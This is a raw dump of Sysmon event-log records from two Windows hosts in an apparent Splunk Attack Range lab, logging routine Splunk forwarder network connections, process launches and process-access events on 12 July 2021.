Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61981-false10.0.1.12-8000- 23542300x80000000000000001055021Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:44.473{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D83D678A355E872E46DB4762C7277F1B,SHA256=BC3BA55FED1FC3B44C3B28320533513BC6DC53497CA8D62BE08A633E6C9263E1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810576Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:43.196{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57476-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810575Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:44.235{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5275FD42E5580733DA70CB9C958D9DBE,SHA256=E0EEB3E0EA25DDB185C64A6D712C487948070308D23A5449BAEF8398FE36E012,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055023Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:45.489{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0DA5C11043917A6C0B8271341F1185B,SHA256=085FF0C9C50A8F8905B7248127F0F279D9308ACB46EC1B970AAD2DC12560B5F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810577Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:45.235{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7948C20A9417CE490B013BC97A2D710,SHA256=38CD957C28FA05E01F948F6F2A2E2835CD58FA07BD2784735923B6163B9C4B96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055024Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:46.504{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69202B8871AE86D2163ED4E405C70C1A,SHA256=3D0E33F466636EBC764DEC91B852DAE7760811C2BEB94EEA769420B30EB9DDA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810578Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:46.251{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=276A93E370553B8AC05B2AE98A2DB3B6,SHA256=6DC548FFCF864A1937C9381E69E0D04BCA2B25B606921EEC9E2695C2775C3897,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055025Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:47.537{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFACD84D0BA942AE9DD02EDBC37430F5,SHA256=8B215F98B715C4AE692CD3B3DB3596CFC903988D2B8309B6A7037E48C763BFD7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810579Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:47.266{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=703F1A3F7A214063BE1A45AAEF71268A,SHA256=ACF4E93DEE2DB8C313ACA89381B7B691D8E8187FBE027F82B85FB68D558EF128,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055026Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:48.556{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DD21A1248F80927686A06A36275D571,SHA256=61A39B4E8301AA1D425F236077A9EC02CB69BAD4830EC35D1FFBDB5207DF014B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810580Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:48.266{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC497E43FBC548513F40F15CD18B5D26,SHA256=238845991C04BE5F06ADC5F27D4ADB73D72EBF3209FF7F52006ACB8A61431828,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055028Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:41.697{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61982-false10.0.1.12-8000- 23542300x80000000000000001055027Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:49.570{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2D3C85BF5D607D3259AACCA26BF64E7,SHA256=9D8EDFA3F5C5F3A0335A18E8F201DEB03DE4768B59BCF5E3E918BA3B79E1AB65,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810582Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:48.259{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57477-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810581Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:49.282{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4425651F7B667214EC270709BD80521,SHA256=0E5C995B5C39AB18476172C1C8625D05532816B8DA3E3A4E33D5D30F6D0C5247,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055046Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:50.917{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F892-60EB-017E-00000000CF01}9028C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055045Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:50.917{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055044Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:50.917{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055043Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:50.917{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055042Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:50.917{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055041Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:50.917{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F892-60EB-017E-00000000CF01}9028C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055040Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:50.917{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F892-60EB-017E-00000000CF01}9028C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055039Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:50.902{466BC892-F892-60EB-017E-00000000CF01}9028C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001055038Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:50.586{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9530D7A6467400F4A8CFA66C425A8BC3,SHA256=7DA968BEB3CC09D8F1696ED5B3741A29DB8185D52D509CB613DE9B6E80F1CB05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810583Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:50.282{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=125630661276FF8BACDE0415B078E796,SHA256=5079C33DEB9EC674254A1F21E8F0F2F1F3F6F94908170FEA261E8F4AF5C729F6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055037Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:50.501{466BC892-F892-60EB-007E-00000000CF01}80448972C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055036Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:50.238{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F892-60EB-007E-00000000CF01}8044C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055035Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:50.238{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055034Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:50.238{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055033Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:50.238{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055032Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:50.238{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055031Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:50.238{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F892-60EB-007E-00000000CF01}8044C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055030Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:50.238{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F892-60EB-007E-00000000CF01}8044C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055029Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:50.218{466BC892-F892-60EB-007E-00000000CF01}8044C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001055058Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:51.879{466BC892-F893-60EB-027E-00000000CF01}6792220C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055057Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:51.603{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F893-60EB-027E-00000000CF01}6792C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055056Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:51.603{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F893-60EB-027E-00000000CF01}6792C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 